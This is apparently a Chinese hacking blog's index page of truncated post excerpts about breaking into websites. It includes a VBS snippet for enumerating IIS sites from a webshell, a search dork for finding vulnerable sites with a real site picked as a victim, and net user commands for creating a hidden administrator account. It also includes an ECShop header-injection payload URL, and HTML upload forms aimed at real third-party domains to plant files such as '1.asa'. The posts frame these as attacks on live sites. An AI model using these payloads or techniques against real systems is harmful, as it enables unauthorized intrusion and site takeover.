今晚在搞个黑客站的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。

       无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就再帖下，并说明用法！

Set ObjService=GetObject("IIS://LocalHost/W3SVC") 

阅读全文……

漏洞出在根目录的auction_list.php,第77行-86行:

/* 浏览记录 */ 
$getcookie = get_hisgoods_cookie(); 
$goodshistory = array(); 

阅读全文……

直接百度或者google一下

关键字：inurl:CompHonorBig.asp?id 出现了很多站点..百度一下，找到相关网页约35,700篇，用时0.231秒

我们到后面几页随便打开一个 http://www.xzruizhe.com/

阅读全文……

可以通过特殊字符建立隐藏账户.命令行界面下不显示,用户管理面板中显示为空.非$..

可以通过智能ABC输入法中V9里的空白字符建立隐藏帐号,命令行下无法建立,可以先写个批处理,如下:
net user 123 /add
net localgroup administrators /add

阅读全文……

/affiche.php,php5环境提示错误暴露程序路径，php4环境显示写入的信息
charset参数未做严谨过滤导致http消息头截断写入
http://localhost/test/ecshop/affiche.php?act=js&type=3&from=xxx&ad_id=1&charset=GBK%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0A%0D%0AContent-Type:%20text/html%0D%0A%0D%0AContent-Length:%2035%0D%0A%0D%0A%3Chtml%3Exxx%3C/html%3E%0D%0A%0D%0A 

阅读全文……

动网（DVBBS）PHP论坛preview.php代码执行漏洞

动网（DVBBS）论坛系统是一个采用PHP和MYSQL的数据架构的高性能网站论坛解决方案。

在文件preview.php中：

阅读全文……

<form id="frmUpload" enctype="multipart/form-data" action="http://aus-snowboots.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

阅读全文……

本地包含的利用方法。

<form action=”http://www.ra1nker/plus/carbuyaction.php?dopost=return&action=xxx&code=../../include/dialog/select_soft_post” method=”post” enctype=”multipart/form-data” name=”QuickSearch” id=”QuickSearch”>
<input type=”hidden” name=”newname” value=”1.asa”>
<input type=”file” name=”uploadfile”>

阅读全文……

NetCMS网站内容管理系是国内最优秀的网站建设程序,全免费全开源 ,由于发表消息附件未

进行严格过滤，导致可上传任意文件漏洞。

测试利用： 1、进去， /user/login.aspx ，点注册。

阅读全文……